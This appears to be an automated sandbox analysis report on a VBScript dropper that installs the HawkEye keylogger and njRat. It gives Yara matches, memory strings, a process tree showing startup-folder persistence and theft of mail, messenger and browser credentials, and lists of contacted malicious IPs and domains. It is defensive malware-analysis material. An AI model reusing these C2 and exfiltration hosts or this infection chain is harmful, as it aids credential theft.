Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4040020.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected HawkEye Rat
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEyeKeylogger
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp String found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp String found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Detected njRat
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs .Net Code: njRat config detected
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs .Net Code: njRat config detected
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs .Net Code: njRat config detected
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0A8E listen, 13_2_02CC0A8E
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0FC6 bind, 13_2_02CC0FC6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0A50 listen, 13_2_02CC0A50
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0F93 bind, 13_2_02CC0F93
Behavior Graph (rendered as an image in the original report; legend and graph controls not reproduced). Behavior Graph ID: 399489, Sample: PaymentNotification.vbs, Startdate: 28/04/2021, Architecture: WINDOWS, Score: 100.

Process tree recovered from the graph's node and edge labels:
  wscript.exe (contacts ia601504.us.archive.org 207.241.227.114:443; drops pgr.exe and Tmp.exe; VBScript performs obfuscated calls to suspicious functions)
    pgr.exe (drops 79c06ef4ef423d882819c4e66285ec85.exe, tmpFB21.tmp.exe and tmp87E4.tmp.exe; drops PE files to the startup folder)
      tmpFB21.tmp.exe (contacts neesoontat.com.my 103.6.196.196:587, whatismyipaddress.com 104.16.154.36:80 and 3 other IPs or domains; may check the online IP address of the machine)
        vbc.exe (tries to steal Mail credentials via registry and file access, and Instant Messenger accounts or passwords)
        vbc.exe (tries to harvest and steal browser information)
      tmp87E4.tmp.exe
      netsh.exe
        conhost.exe
    Tmp.exe (drops servieda.exe; detected unpacking, overwrites its own PE header)
      servieda.exe (contacts 185.140.53.71:3429 DAVID_CRAIGGG Sweden; drops d4c6a6df7bab3dad31763de990c4ed82.exe to the startup folder)
        netsh.exe
          conhost.exe
  d4c6a6df7bab3dad31763de990c4ed82.exe (started on its own from the startup folder)

Contacted Public IPs

IP               Domain                    Country        ASN     ASN Name                                Malicious
104.16.154.36    whatismyipaddress.com     United States  13335   CLOUDFLARENETUS                         false
103.6.196.196    neesoontat.com.my         Malaysia       46015   EXABYTES-AS-APExaBytesNetworkSdnBhdMY   true
207.241.227.114  ia601504.us.archive.org   United States  7941    INTERNET-ARCHIVEUS                      false
185.140.53.71    unknown                   Sweden         209623  DAVID_CRAIGGG                           true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
whatismyipaddress.com 104.16.154.36 true
ia601504.us.archive.org 207.241.227.114 true
neesoontat.com.my 103.6.196.196 true
81.189.14.0.in-addr.arpa unknown unknown
mail.neesoontat.com.my unknown unknown

Contacted URLs

Name                           Malicious  Antivirus Detection    Reputation
http://whatismyipaddress.com/  false                             high
185.140.53.71                  true       Avira URL Cloud: safe  unknown